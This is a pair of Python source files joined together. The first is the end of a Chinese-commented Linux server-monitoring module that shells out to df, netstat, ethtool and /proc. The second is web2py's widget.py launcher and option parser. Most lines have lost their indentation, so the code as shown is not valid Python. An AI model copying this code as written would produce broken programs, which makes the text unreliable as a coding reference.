logger.info(f'当前系统共有{len(self.all_disk)}个磁盘,磁盘号分别为{"、".join(self.all_disk)}')
@handle_exception(is_return=True)
def get_system_nic(self):
"""
获取系统使用的网卡。
只能获取一个网卡,如果系统使用多个网卡,只能获取第一个,网卡排序使用 cat /proc/net/dev 查看
:return:
"""
network_card = []
result = os.popen('cat /proc/net/dev |tr -s " "').readlines() # 获取网卡
logger.debug(f'查询网卡时,第一次执行命令结果:{result}')
time.sleep(1)
result1 = os.popen('cat /proc/net/dev |tr -s " "').readlines() # 一秒后再次获取网卡
logger.debug(f'查询网卡时,第二次执行命令结果:{result1}')
for i in range(len(result)):
if ':' in result[i]:
title = result[i].strip().split(':')[0]
data = result[i].strip().split(':')[1]
title1 = result1[i].strip().split(':')[0]
data1 = result1[i].strip().split(':')[1]
if title == title1:
logger.debug(f'第一次数据有变化的网卡数据:{data}')
logger.debug(f'第二次数据有变化的网卡数据:{data1}')
rec = data.strip().split(' ')[0]
rec1 = data1.strip().split(' ')[0]
if rec != rec1: # 如果这个网卡数据有变化,则说明此卡在使用
network_card.append(title)
logger.debug(f'当前获得网卡数据:{network_card}')
if 'lo' in network_card: # 'lo'卡是本地127.0.0.1,需要去掉
network_card.pop(network_card.index('lo'))
if len(network_card) > 0: # 获取第一个卡
self.nic = network_card[0]
logger.info(f'当前服务器使用的网卡为{self.nic}')
else:
logger.error('当前服务器网卡未找到')
@handle_exception(is_return=True)
def get_total_disk_size(self):
"""
获取磁盘总大小
:return:
"""
result = os.popen('df -m |tr -s " "').readlines()
logger.debug(f'查询磁盘执行命令结果:{result}')
for line in result:
res = line.strip().split(' ')
if '/dev/' in res[0]:
size = float(res[1])
self.total_disk += size
logger.debug(f'当前磁盘大小为:{self.total_disk}M')
self.total_disk_h = self.total_disk / 1024
if self.total_disk_h > 1024:
total = round(self.total_disk_h / 1024, 2)
self.total_disk_h = f'{total}T'
else:
total = round(self.total_disk_h, 2)
self.total_disk_h = f'{total}G'
logger.info(f'当前服务器磁盘总大小为{self.total_disk_h}')
@handle_exception(is_return=True, default_value=0)
def get_used_disk_rate(self):
"""
获取磁盘使用的大小
:return:
"""
used_disk_size = 0
result = os.popen('df -m |tr -s " "').readlines()
logger.debug(f'查询磁盘执行命令结果:{result}')
for line in result:
res = line.strip().split(' ')
if '/dev/' in res[0]:
size = float(res[2])
used_disk_size += size
logger.info(f'当前磁盘已使用{used_disk_size}G')
return used_disk_size / self.total_disk
@handle_exception(is_return=True)
def get_system_net_speed(self):
"""
获取系统的带宽,单位是 Mbs
:return:
"""
if self.nic:
result = os.popen(f'ethtool {self.nic}').readlines()
logger.debug(f'查询网络带宽执行命令结果:{result}')
for line in result:
if 'Speed' in line:
logger.debug(f'当前网络带宽为:{line}')
res = re.findall("(\d+)", line)
speed = int(res[0])
if 'G' in line:
speed = speed * 1024
if 'K' in line:
speed = speed / 1024
self.network_speed = speed
break
logger.info(f'当前服务器网口带宽为{self.network_speed}Mb/s')
@handle_exception(is_return=True)
def get_system_version(self):
"""
获取系统发行版本或内核版本
:return:
"""
result = os.popen('cat /etc/redhat-release').readlines() # 获取系统发行版本
logger.debug(f'查询系统发行版本执行命令结果:{result}')
if result:
self.system_version = result[0].strip()
else:
result = os.popen('cat /proc/version').readlines()[0] # 获取系统内核版本
logger.debug(f'查询系统内核版本执行命令结果:{result}')
res = re.findall("gcc.*\((.*?)\).*GCC", result.strip())
self.system_version = res[0]
logger.info(f'当前系统发行/内核版本为{self.system_version}')
def is_java_server(self, port):
"""
判断端口是否是java服务
:param port: 端口号
"""
pid = port_to_pid(port)
try:
result = os.popen(f'jstat -gc {pid} |tr -s " "').readlines()[1] # 执行命令
res = result.strip().split(' ')
logger.debug(f'查询进程{pid}的JVM结果为:{res}')
_ = float(res[2]) + float(res[3]) + float(res[5]) + float(res[7]) # 计算jvm
self.is_java.update({str(port): 1})
except Exception as err:
logger.info(err)
self.is_java.update({str(port): 0})
@handle_exception(is_return=True)
def clear_port(self):
"""
清理系统存储的已经停止监控超过86400s的端口信息
:return:
"""
pop_list = []
for ind in range(len(self._msg['port'])):
if self._msg['isRun'][ind] == 0 and self._msg['stopTime'][ind]:
if time.time() - self._msg['stopTime'][ind] > 7200:
pop_list.append(ind)
logger.debug(f'清理过期停止监控端口:{pop_list}')
for ll in pop_list:
port = self._msg['port'].pop(ll)
self._msg['pid'].pop(ll)
self._msg['isRun'].pop(ll)
self._msg['startTime'].pop(ll)
self._msg['stopTime'].pop(ll)
del self.FGC[str(port)], self.FGC_time[str(port)]
logger.info(f'清理端口{port}成功')
def register_and_clear_port(self, flag=None):
"""
已弃用,该功能已放在 self.write_system_cpu_mem_and_register_clear 函数中执行
定时任务,总共有两个,一个是向服务端注册本机,一个是清理已经停止监控的过期端口
:param
:return:
"""
pass
'''url = f'http://{cfg.getMaster("host")}:{cfg.getMaster("port")}/Register'
header = {
"Accept": "application/json, text/plain, */*",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "application/json; charset=UTF-8"}
post_data = {
'host': self.IP,
'port': cfg.getServer('port'),
'system': self.system_version,
'cpu': self.cpu_cores,
'nic': self.nic,
'network_speed': self.network_speed,
'mem': round(self.total_mem*100, 2),
'disk_size': self.total_disk,
'disks': ','.join(self.all_disk)
}
clear_time = time.time()
while True:
try:
res = requests.post(url=url, json=post_data, headers=header)
if time.time() - clear_time > 600:
self.clear_port()
clear_time = time.time()
except Exception as err:
logger.error(err)
time.sleep(5)'''
def clear_cache(self):
"""
清理缓存
:return:
"""
logger.info(f'开始清理缓存:echo {self.echo} >/proc/sys/vm/drop_caches')
os.popen(f'echo {self.echo} >/proc/sys/vm/drop_caches')
logger.info('清理缓存成功')
def __del__(self):
pass
@handle_exception(is_return=True)
def port_to_pid(port):
"""
根据端口号查询进程号
:param port: 端口号
:return: 进程号
"""
pid = None
result = os.popen(f'netstat -nlp|grep {port} |tr -s " "').readlines()
logger.debug(f'{port}端口的进程结果为:{result}')
flag = f':{port}'
res = [line.strip() for line in result if flag in line]
logger.debug(res[0])
p = res[0].split(' ')
pp = p[3].split(':')[-1]
if str(port) == pp:
pid = p[p.index('LISTEN') + 1].split('/')[0]
return pid
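# Illustrative note (not part of the original module), assuming a netstat line
# such as:
#   tcp 0 0 0.0.0.0:8080 0.0.0.0:* LISTEN 12345/java
# port_to_pid() above matches ':8080' against column p[3] and takes the pid
# from the 'pid/program' field that follows 'LISTEN'.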
@handle_exception(is_return=True)
def notification(msg):
"""
发送邮件通知
:param msg: 邮件正文信息
:return:
"""
url = f'http://{cfg.getMaster("host")}:{cfg.getMaster("port")}/Notification'
header = {
"Accept": "application/json, text/plain, */*",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "application/json; charset=UTF-8"}
post_data = {
'host': cfg.getServer('host'),
'msg': msg
}
logger.debug(f'发送邮件信息的内容:{msg}')
res = requests.post(url=url, json=post_data, headers=header)
if res.status_code == 200:
response = json.loads(res.content.decode())
if response['code'] == 0:
logger.info('邮件发送成功')
else:
logger.error(response['msg'])
else:
logger.error('邮件发送失败')
|
widget.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
| This file is part of the web2py Web Framework
| Copyrighted by Massimo Di Pierro <mdipierro@cs.depaul.edu>
| License: LGPLv3 (http://www.gnu.org/licenses/lgpl.html)
The widget is called from web2py
----------------------------------
"""
import datetime
import sys
import cStringIO
import time
import thread
import threading
import os
import socket
import signal
import math
import logging
import newcron
import getpass
import gluon.main as main
from gluon.fileutils import read_file, write_file, create_welcome_w2p
from gluon.settings import global_settings
from gluon.shell import run, test
from gluon.utils import is_valid_ip_address, is_loopback_ip_address, getipaddrinfo
ProgramName = 'web2py Web Framework'
ProgramAuthor = 'Created by Massimo Di Pierro, Copyright 2007-' + str(
datetime.datetime.now().year)
ProgramVersion = read_file('VERSION').strip()
ProgramInfo = '''%s
%s
%s''' % (ProgramName, ProgramAuthor, ProgramVersion)
if not sys.version[:3] in ['2.5', '2.6', '2.7']:
msg = 'Warning: web2py requires Python 2.5, 2.6 or 2.7 but you are running:\n%s'
msg = msg % sys.version
sys.stderr.write(msg)
logger = logging.getLogger("web2py")
def run_system_tests(options):
"""
Runs unittests for gluon.tests
"""
import subprocess
major_version = sys.version_info[0]
minor_version = sys.version_info[1]
if major_version == 2:
if minor_version in (5, 6):
sys.stderr.write("Python 2.5 or 2.6\n")
ret = subprocess.call(['unit2', '-v', 'gluon.tests'])
elif minor_version in (7,):
call_args = [sys.executable, '-m', 'unittest', '-v', 'gluon.tests']
if options.with_coverage:
try:
import coverage
coverage_config = os.environ.get(
"COVERAGE_PROCESS_START",
os.path.join('gluon', 'tests', 'coverage.ini'))
call_args = ['coverage', 'run', '--rcfile=%s' %
coverage_config,
'-m', 'unittest', '-v', 'gluon.tests']
except:
sys.stderr.write('Coverage was not installed, skipping\n')
sys.stderr.write("Python 2.7\n")
ret = subprocess.call(call_args)
else:
sys.stderr.write("unknown python 2.x version\n")
ret = 256
else:
sys.stderr.write("Only Python 2.x supported.\n")
ret = 256
sys.exit(ret and 1)
class IO(object):
    """Tee-like stream: writes go to the real stdout and to a callback or an internal buffer."""
    def __init__(self):
        self.buffer = cStringIO.StringIO()
    def write(self, data):
sys.__stdout__.write(data)
if hasattr(self, 'callback'):
self.callback(data)
else:
self.buffer.write(data)
def get_url(host, path='/', proto='http', port=80):
if ':' in host:
host = '[%s]' % host
else:
host = host.replace('0.0.0.0', '127.0.0.1')
if path.startswith('/'):
path = path[1:]
if proto.endswith(':'):
proto = proto[:-1]
if not port or port == 80:
port = ''
else:
port = ':%s' % port
return '%s://%s%s/%s' % (proto, host, port, path)
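# Doctest-style examples (added for illustration; not in the original file):
# >>> get_url('0.0.0.0', port=8000)
# 'http://127.0.0.1:8000/'
# >>> get_url('::1', proto='https', port=8443)
# 'https://[::1]:8443/'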
def start_browser(url, startup=False):
if startup:
print 'please visit:'
print '\t', url
print 'starting browser...'
try:
import webbrowser
webbrowser.open(url)
except:
print 'warning: unable to detect your browser'
class web2pyDialog(object):
""" Main window dialog """
def __init__(self, root, options):
""" web2pyDialog constructor """
import Tkinter
import tkMessageBox
bg_color = 'white'
root.withdraw()
self.root = Tkinter.Toplevel(root, bg=bg_color)
self.root.resizable(0,0)
self.root.title(ProgramName)
self.options = options
self.scheduler_processes = {}
self.menu = Tkinter.Menu(self.root)
servermenu = Tkinter.Menu(self.menu, tearoff=0)
httplog = os.path.join(self.options.folder, 'httpserver.log')
iconphoto = os.path.join('extras','icons','web2py.gif')
if os.path.exists(iconphoto):
img = Tkinter.PhotoImage(file=iconphoto)
self.root.tk.call('wm', 'iconphoto', self.root._w, img)
# Building the Menu
item = lambda: start_browser(httplog)
servermenu.add_command(label='View httpserver.log',
command=item)
servermenu.add_command(label='Quit (pid:%i)' % os.getpid(),
command=self.quit)
self.menu.add_cascade(label='Server', menu=servermenu)
self.pagesmenu = Tkinter.Menu(self.menu, tearoff=0)
self.menu.add_cascade(label='Pages', menu=self.pagesmenu)
#scheduler menu
self.schedmenu = Tkinter.Menu(self.menu, tearoff=0)
self.menu.add_cascade(label='Scheduler', menu=self.schedmenu)
#start and register schedulers from options
self.update_schedulers(start=True)
helpmenu = Tkinter.Menu(self.menu, tearoff=0)
# Home Page
item = lambda: start_browser('http://www.web2py.com/')
helpmenu.add_command(label='Home Page',
command=item)
# About
item = lambda: tkMessageBox.showinfo('About web2py', ProgramInfo)
helpmenu.add_command(label='About',
command=item)
self.menu.add_cascade(label='Info', menu=helpmenu)
self.root.config(menu=self.menu)
if options.taskbar:
self.root.protocol('WM_DELETE_WINDOW',
lambda: self.quit(True))
else:
self.root.protocol('WM_DELETE_WINDOW', self.quit)
sticky = Tkinter.NW
# Prepare the logo area
self.logoarea = Tkinter.Canvas(self.root,
background=bg_color,
width=300,
height=300)
self.logoarea.grid(row=0, column=0, columnspan=4, sticky=sticky)
self.logoarea.after(1000, self.update_canvas)
logo = os.path.join('extras','icons','splashlogo.gif')
if os.path.exists(logo):
img = Tkinter.PhotoImage(file=logo)
pnl = Tkinter.Label(self.logoarea, image=img, background=bg_color, bd=0)
pnl.pack(side='top', fill='both', expand='yes')
# Prevent garbage collection of img
pnl.image = img
# Prepare the banner area
self.bannerarea = Tkinter.Canvas(self.root,
bg=bg_color,
width=300,
height=300)
self.bannerarea.grid(row=1, column=1, columnspan=2, sticky=sticky)
Tkinter.Label(self.bannerarea, anchor=Tkinter.N,
text=str(ProgramVersion + "\n" + ProgramAuthor),
font=('Helvetica', 11), justify=Tkinter.CENTER,
foreground='#195866', background=bg_color,
height=3).pack( side='top',
fill='both',
expand='yes')
self.bannerarea.after(1000, self.update_canvas)
# IP
Tkinter.Label(self.root,
text='Server IP:', bg=bg_color,
justify=Tkinter.RIGHT).grid(row=4,
column=1,
sticky=sticky)
self.ips = {}
self.selected_ip = Tkinter.StringVar()
row = 4
ips = [('127.0.0.1', 'Local (IPv4)')] + \
([('::1', 'Local (IPv6)')] if socket.has_ipv6 else []) + \
[(ip, 'Public') for ip in options.ips] + \
[('0.0.0.0', 'Public')]
for ip, legend in ips:
self.ips[ip] = Tkinter.Radiobutton(
self.root, bg=bg_color, highlightthickness=0,
selectcolor='light grey', width=30,
anchor=Tkinter.W, text='%s (%s)' % (legend, ip),
justify=Tkinter.LEFT,
variable=self.selected_ip, value=ip)
self.ips[ip].grid(row=row, column=2, sticky=sticky)
if row == 4:
self.ips[ip].select()
row += 1
shift = row
# Port
Tkinter.Label(self.root,
text='Server Port:', bg=bg_color,
justify=Tkinter.RIGHT).grid(row=shift,
column=1, pady=10,
sticky=sticky)
self.port_number = Tkinter.Entry(self.root)
self.port_number.insert(Tkinter.END, self.options.port)
self.port_number.grid(row=shift, column=2, sticky=sticky, pady=10)
# Password
Tkinter.Label(self.root,
text='Choose Password:', bg=bg_color,
justify=Tkinter.RIGHT).grid(row=shift + 1,
column=1,
sticky=sticky)
self.password = Tkinter.Entry(self.root, show='*')
self.password.bind('<Return>', lambda e: self.start())
self.password.focus_force()
self.password.grid(row=shift + 1, column=2, sticky=sticky)
# Prepare the canvas
self.canvas = Tkinter.Canvas(self.root,
width=400,
height=100,
bg='black')
self.canvas.grid(row=shift + 2, column=1, columnspan=2, pady=5,
sticky=sticky)
self.canvas.after(1000, self.update_canvas)
# Prepare the frame
frame = Tkinter.Frame(self.root)
frame.grid(row=shift + 3, column=1, columnspan=2, pady=5,
sticky=sticky)
# Start button
self.button_start = Tkinter.Button(frame,
text='start server',
command=self.start)
self.button_start.grid(row=0, column=0, sticky=sticky)
# Stop button
self.button_stop = Tkinter.Button(frame,
text='stop server',
command=self.stop)
self.button_stop.grid(row=0, column=1, sticky=sticky)
self.button_stop.configure(state='disabled')
if options.taskbar:
import gluon.contrib.taskbar_widget
self.tb = gluon.contrib.taskbar_widget.TaskBarIcon()
self.checkTaskBar()
if options.password != '<ask>':
self.password.insert(0, options.password)
self.start()
self.root.withdraw()
else:
self.tb = None
def update_schedulers(self, start=False):
apps = []
available_apps = [arq for arq in os.listdir('applications/')]
available_apps = [arq for arq in available_apps
if os.path.exists(
'applications/%s/models/scheduler.py' % arq)]
if start:
#the widget takes care of starting the scheduler
if self.options.scheduler and self.options.with_scheduler:
apps = [app.strip() for app
in self.options.scheduler.split(',')
if app in available_apps]
for app in apps:
self.try_start_scheduler(app)
#reset the menu
self.schedmenu.delete(0, len(available_apps))
for arq in available_apps:
if arq not in self.scheduler_processes:
item = lambda u = arq: self.try_start_scheduler(u)
self.schedmenu.add_command(label="start %s" % arq,
command=item)
if arq in self.scheduler_processes:
item = lambda u = arq: self.try_stop_scheduler(u)
self.schedmenu.add_command(label="stop %s" % arq,
command=item)
def start_schedulers(self, app):
try:
from multiprocessing import Process
except:
sys.stderr.write('Sorry, -K only supported for python 2.6-2.7\n')
return
code = "from gluon import current;current._scheduler.loop()"
print 'starting scheduler from widget for "%s"...' % app
args = (app, True, True, None, False, code)
logging.getLogger().setLevel(self.options.debuglevel)
p = Process(target=run, args=args)
self.scheduler_processes[app] = p
self.update_schedulers()
print "Currently running %s scheduler processes" % (
len(self.scheduler_processes))
p.start()
print "Processes started"
def try_stop_scheduler(self, app):
if app in self.scheduler_processes:
p = self.scheduler_processes[app]
del self.scheduler_processes[app]
p.terminate()
p.join()
self.update_schedulers()
def try_start_scheduler(self, app):
if app not in self.scheduler_processes:
t = threading.Thread(target=self.start_schedulers, args=(app,))
t.start()
def checkTaskBar(self):
""" Checks taskbar status """
if self.tb.status:
if self.tb.status[0] == self.tb.EnumStatus.QUIT:
self.quit()
elif self.tb.status[0] == self.tb.EnumStatus.TOGGLE:
if self.root.state() == 'withdrawn':
self.root.deiconify()
else:
self.root.withdraw()
elif self.tb.status[0] == self.tb.EnumStatus.STOP:
self.stop()
elif self.tb.status[0] == self.tb.EnumStatus.START:
self.start()
elif self.tb.status[0] == self.tb.EnumStatus.RESTART:
self.stop()
self.start()
del self.tb.status[0]
self.root.after(1000, self.checkTaskBar)
def update(self, text):
""" Updates app text """
try:
self.text.configure(state='normal')
self.text.insert('end', text)
self.text.configure(state='disabled')
except:
pass # ## this should only happen in case app is destroyed
def connect_pages(self):
""" Connects pages """
#reset the menu
available_apps = [arq for arq in os.listdir('applications/')
if os.path.exists(
'applications/%s/__init__.py' % arq)]
self.pagesmenu.delete(0, len(available_apps))
for arq in available_apps:
url = self.url + arq
self.pagesmenu.add_command(
label=url, command=lambda u=url: start_browser(u))
def quit(self, justHide=False):
""" Finishes the program execution """
if justHide:
self.root.withdraw()
else:
try:
scheds = self.scheduler_processes.keys()
for t in scheds:
self.try_stop_scheduler(t)
except:
pass
try:
newcron.stopcron()
except:
pass
try:
self.server.stop()
except:
pass
try:
self.tb.Destroy()
except:
pass
self.root.destroy()
sys.exit(0)
def error(self, message):
""" Shows error message """
import tkMessageBox
tkMessageBox.showerror('web2py start server', message)
def start(self):
""" Starts web2py server """
password = self.password.get()
if not password:
self.error('no password, no web admin interface')
ip = self.selected_ip.get()
if not is_valid_ip_address(ip):
return self.error('invalid host ip address')
try:
port = int(self.port_number.get())
except:
return self.error('invalid port number')
# Check for non default value for ssl inputs
if (len(self.options.ssl_certificate) > 0 or
len(self.options.ssl_private_key) > 0):
proto = 'https'
else:
proto = 'http'
self.url = get_url(ip, proto=proto, port=port)
self.connect_pages()
self.button_start.configure(state='disabled')
try:
options = self.options
req_queue_size = options.request_queue_size
self.server = main.HttpServer(
ip,
port,
password,
pid_filename=options.pid_filename,
log_filename=options.log_filename,
profiler_dir=options.profiler_dir,
ssl_certificate=options.ssl_certificate,
ssl_private_key=options.ssl_private_key,
ssl_ca_certificate=options.ssl_ca_certificate,
min_threads=options.minthreads,
max_threads=options.maxthreads,
server_name=options.server_name,
request_queue_size=req_queue_size,
timeout=options.timeout,
shutdown_timeout=options.shutdown_timeout,
path=options.folder,
interfaces=options.interfaces)
thread.start_new_thread(self.server.start, ())
except Exception, e:
self.button_start.configure(state='normal')
return self.error(str(e))
if not self.server_ready():
self.button_start.configure(state='normal')
return
self.button_stop.configure(state='normal')
if not options.taskbar:
thread.start_new_thread(
start_browser, (get_url(ip, proto=proto, port=port), True))
self.password.configure(state='readonly')
[ip.configure(state='disabled') for ip in self.ips.values()]
self.port_number.configure(state='readonly')
if self.tb:
self.tb.SetServerRunning()
def server_ready(self):
for listener in self.server.server.listeners:
if listener.ready:
return True
return False
def stop(self):
""" Stops web2py server """
self.button_start.configure(state='normal')
self.button_stop.configure(state='disabled')
self.password.configure(state='normal')
[ip.configure(state='normal') for ip in self.ips.values()]
self.port_number.configure(state='normal')
self.server.stop()
if self.tb:
self.tb.SetServerStopped()
def update_canvas(self):
""" Updates canvas """
try:
t1 = os.path.getsize('httpserver.log')
except:
self.canvas.after(1000, self.update_canvas)
return
try:
fp = open('httpserver.log', 'r')
fp.seek(self.t0)
data = fp.read(t1 - self.t0)
fp.close()
value = self.p0[1:] + [10 + 90.0 / math.sqrt(1 + data.count('\n'))]
self.p0 = value
for i in xrange(len(self.p0) - 1):
c = self.canvas.coords(self.q0[i])
self.canvas.coords(self.q0[i],
(c[0],
self.p0[i],
c[2],
self.p0[i + 1]))
self.t0 = t1
except BaseException:
self.t0 = time.time()
self.t0 = t1
self.p0 = [100] * 400
self.q0 = [self.canvas.create_line(i, 100, i + 1, 100,
fill='green') for i in xrange(len(self.p0) - 1)]
self.canvas.after(1000, self.update_canvas)
def console():
""" Defines the behavior of the console web2py execution """
import optparse
import textwrap
usage = "python web2py.py"
description = """\
web2py Web Framework startup script.
ATTENTION: unless a password is specified (-a 'passwd') web2py will
attempt to run a GUI. In this case command line options are ignored."""
description = textwrap.dedent(description)
parser = optparse.OptionParser(
usage, None, optparse.Option, ProgramVersion)
parser.description = description
msg = ('IP address of the server (e.g., 127.0.0.1 or ::1); '
'Note: This value is ignored when using the \'interfaces\' option.')
parser.add_option('-i',
'--ip',
default='127.0.0.1',
dest='ip',
help=msg)
parser.add_option('-p',
'--port',
default='8000',
dest='port',
type='int',
help='port of server (8000)')
parser.add_option('-G',
'--GAE',
default=None,
dest='gae',
help="'-G configure' will create app.yaml and gaehandler.py")
msg = ('password to be used for administration '
'(use -a "<recycle>" to reuse the last password)')
parser.add_option('-a',
'--password',
default='<ask>',
dest='password',
help=msg)
parser.add_option('-c',
'--ssl_certificate',
default='',
dest='ssl_certificate',
help='file that contains ssl certificate')
parser.add_option('-k',
'--ssl_private_key',
default='',
dest='ssl_private_key',
help='file that contains ssl private key')
msg = ('Use this file containing the CA certificate to validate X509 '
'certificates from clients')
parser.add_option('--ca-cert',
action='store',
dest='ssl_ca_certificate',
default=None,
help=msg)
parser.add_option('-d',
'--pid_filename',
default='httpserver.pid',
dest='pid_filename',
help='file to store the pid of the server')
parser.add_option('-l',
'--log_filename',
default='httpserver.log',
dest='log_filename',
help='file to log connections')
parser.add_option('-n',
'--numthreads',
default=None,
type='int',
dest='numthreads',
help='number of threads (deprecated)')
parser.add_option('--minthreads',
default=None,
type='int',
dest='minthreads',
help='minimum number of server threads')
parser.add_option('--maxthreads',
default=None,
type='int',
dest='maxthreads',
help='maximum number of server threads')
parser.add_option('-s',
'--server_name',
default=socket.gethostname(),
dest='server_name',
help='server name for the web server')
msg = 'max number of queued requests when server unavailable'
parser.add_option('-q',
'--request_queue_size',
default='5',
type='int',
dest='request_queue_size',
help=msg)
parser.add_option('-o',
'--timeout',
default='10',
type='int',
dest='timeout',
help='timeout for individual request (10 seconds)')
parser.add_option('-z',
'--shutdown_timeout',
default='5',
type='int',
dest='shutdown_timeout',
help='timeout on shutdown of server (5 seconds)')
parser.add_option('--socket-timeout',
default=5,
type='int',
dest='socket_timeout',
help='timeout for socket (5 seconds)')
parser.add_option('-f',
'--folder',
default=os.getcwd(),
dest='folder',
help='folder from which to run web2py')
parser.add_option('-v',
'--verbose',
action='store_true',
dest='verbose',
default=False,
help='increase --test verbosity')
parser.add_option('-Q',
'--quiet',
action='store_true',
dest='quiet',
default=False,
help='disable all output')
msg = ('set debug output level (0-100, 0 means all, 100 means none; '
'default is 30)')
parser.add_option('-D',
'--debug',
dest='debuglevel',
default=30,
type='int',
help=msg)
msg = ('run web2py in interactive shell or IPython (if installed) with '
'specified appname (if app does not exist it will be created). '
'APPNAME like a/c/f (c,f optional)')
parser.add_option('-S',
'--shell',
dest='shell',
metavar='APPNAME',
help=msg)
msg = ('run web2py in interactive shell or bpython (if installed) with '
'specified appname (if app does not exist it will be created).\n'
'Use combined with --shell')
parser.add_option('-B',
'--bpython',
action='store_true',
default=False,
dest='bpython',
help=msg)
msg = 'only use plain python shell; should be used with --shell option'
parser.add_option('-P',
'--plain',
action='store_true',
default=False,
dest='plain',
help=msg)
msg = ('auto import model files; default is False; should be used '
'with --shell option')
parser.add_option('-M',
'--import_models',
action='store_true',
default=False,
dest='import_models',
help=msg)
msg = ('run PYTHON_FILE in web2py environment; '
'should be used with --shell option')
parser.add_option('-R',
'--run',
dest='run',
metavar='PYTHON_FILE',
default='',
help=msg)
msg = ('run scheduled tasks for the specified apps: expects a list of '
'app names as -K app1,app2,app3 '
'or a list of app:groups as -K app1:group1:group2,app2:group1 '
'to override specific group_names. (only strings, no spaces '
'allowed). Requires a scheduler defined in the models')
parser.add_option('-K',
'--scheduler',
dest='scheduler',
default=None,
help=msg)
msg = 'run schedulers alongside webserver, needs -K app1 and -a too'
parser.add_option('-X',
'--with-scheduler',
action='store_true',
default=False,
dest='with_scheduler',
help=msg)
msg = ('run doctests in web2py environment; '
'TEST_PATH like a/c/f (c,f optional)')
parser.add_option('-T',
'--test',
dest='test',
metavar='TEST_PATH',
default=None,
help=msg)
msg = 'trigger a cron run manually; usually invoked from a system crontab'
parser.add_option('-C',
'--cron',
action='store_true',
dest='extcron',
default=False,
help=msg)
msg = 'triggers the use of softcron'
parser.add_option('--softcron',
action='store_true',
dest='softcron',
default=False,
help=msg)
parser.add_option('-Y',
'--run-cron',
action='store_true',
dest='runcron',
default=False,
help='start the background cron process')
parser.add_option('-J',
'--cronjob',
action='store_true',
dest='cronjob',
default=False,
help='identify cron-initiated command')
parser.add_option('-L',
'--config',
dest='config',
default='',
help='config file')
parser.add_option('-F',
'--profiler',
dest='profiler_dir',
default=None,
help='profiler dir')
parser.add_option('-t',
'--taskbar',
action='store_true',
dest='taskbar',
default=False,
help='use web2py gui and run in taskbar (system tray)')
parser.add_option('',
'--nogui',
action='store_true',
default=False,
dest='nogui',
help='text-only, no GUI')
msg = ('should be followed by a list of arguments to be passed to script, '
'to be used with -S, -A must be the last option')
parser.add_option('-A',
'--args',
action='store',
dest='args',
default=None,
help=msg)
parser.add_option('--no-banner',
action='store_true',
default=False,
dest='nobanner',
help='Do not print header banner')
msg = ('listen on multiple addresses: '
'"ip1:port1:key1:cert1:ca_cert1;ip2:port2:key2:cert2:ca_cert2;..." '
'(:key:cert:ca_cert optional; no spaces; IPv6 addresses must be in '
'square [] brackets)')
parser.add_option('--interfaces',
action='store',
dest='interfaces',
default=None,
help=msg)
msg = 'runs web2py tests'
parser.add_option('--run_system_tests',
action='store_true',
dest='run_system_tests',
default=False,
help=msg)
msg = ('adds coverage reporting (needs --run_system_tests), '
'python 2.7 and the coverage module installed. '
'You can alter the default path setting the environmental '
'var "COVERAGE_PROCESS_START". '
'By default it takes gluon/tests/coverage.ini')
parser.add_option('--with_coverage',
action='store_true',
dest='with_coverage',
default=False,
help=msg)
if '-A' in sys.argv:
k = sys.argv.index('-A')
elif '--args' in sys.argv:
k = sys.argv.index('--args')
else:
k = len(sys.argv)
sys.argv, other_args = sys.argv[:k], sys.argv[k + 1:]
(options, args) = parser.parse_args()
options.args = [options.run] + other_args
global_settings.cmd_options = options
global_settings.cmd_args = args
if options.gae:
if not os.path.exists('app.yaml'):
name = raw_input("Your GAE app name: ")
content = open(os.path.join('examples','app.example.yaml'),'rb').read()
open('app.yaml','wb').write(content.replace("yourappname",name))
else:
print "app.yaml alreday exists in the web2py folder"
if not os.path.exists('gaehandler.py'):
content = open(os.path.join('handlers','gaehandler.py'),'rb').read()
open('gaehandler.py','wb').write(content)
else:
print "gaehandler.py alreday exists in the web2py folder"
sys.exit(0)
try:
options.ips = list(set( # no duplicates
[addrinfo[4][0] for addrinfo in getipaddrinfo(socket.getfqdn())
if not is_loopback_ip_address(addrinfo=addrinfo)]))
except socket.gaierror:
options.ips = []
if options.run_system_tests:
run_system_tests(options)
if options.quiet:
capture = cStringIO.StringIO()
sys.stdout = capture
logger.setLevel(logging.CRITICAL + 1)
else:
logger.setLevel(options.debuglevel)
if options.config[-3:] == '.py':
options.config = options.config[:-3]
if options.cronjob:
global_settings.cronjob = True # tell the world
options.plain = True # cronjobs use a plain shell
options.nobanner = True
options.nogui = True
options.folder = os.path.abspath(options.folder)
# accept --interfaces in the form
# "ip1:port1:key1:cert1:ca_cert1;[ip2]:port2;ip3:port3:key3:cert3"
# (no spaces; optional key:cert indicate SSL)
if isinstance(options.interfaces, str):
interfaces = options.interfaces.split(';')
options.interfaces = []
for interface in interfaces:
if interface.startswith('['): # IPv6
ip, if_remainder = interface.split(']', 1)
ip = ip[1:]
if_remainder = if_remainder[1:].split(':')
if_remainder[0] = int(if_remainder[0]) # numeric port
options.interfaces.append(tuple([ip] + if_remainder))
else: # IPv4
interface = interface.split(':')
interface[1] = int(interface[1]) # numeric port
options.interfaces.append(tuple(interface))
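# Worked example (added for illustration; not in the original file): the option string
# '127.0.0.1:8000;[::1]:8001:key.pem:cert.pem' is parsed into
# [('127.0.0.1', 8000), ('::1', 8001, 'key.pem', 'cert.pem')].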
# accepts --scheduler in the form
# "app:group1,group2,app2:group1"
scheduler = []
options.scheduler_groups = None
if isinstance(options.scheduler, str):
if ':' in options.scheduler:
for opt in options.scheduler.split(','):
scheduler.append(opt.split(':'))
options.scheduler = ','.join([app[0] for app in scheduler])
options.scheduler_groups = scheduler
if options.numthreads is not None and options.minthreads is None:
options.minthreads = options.numthreads # legacy
create_welcome_w2p()
if not options.cronjob:
# If we have the applications package or if we should upgrade
if not os.path.exists('applications/__init__.py'):
write_file('applications/__init__.py', '')
return options, args
def check_existent_app(options, appname):
if os.path.isdir(os.path.join(options.folder, 'applications', appname)):
return True
def get_code_for_scheduler(app, options):
if len(app) == 1 or app[1] is None:
code = "from gluon import current;current._scheduler.loop()"
else:
code = "from gluon import current;current._scheduler.group_names = ['%s'];"
code += "current._scheduler.loop()"
code = code % ("','".join(app[1:]))
app_ = app[0]
if not check_existent_app(options, app_):
print "Application '%s' doesn't exist, skipping" % app_
return None, None
return app_, code
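# Worked example (added for illustration; not in the original file): for the app spec
# ['myapp', 'group1', 'group2'] the generated code string is
# "from gluon import current;current._scheduler.group_names = ['group1','group2'];current._scheduler.loop()"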
def start_schedulers(options):
try:
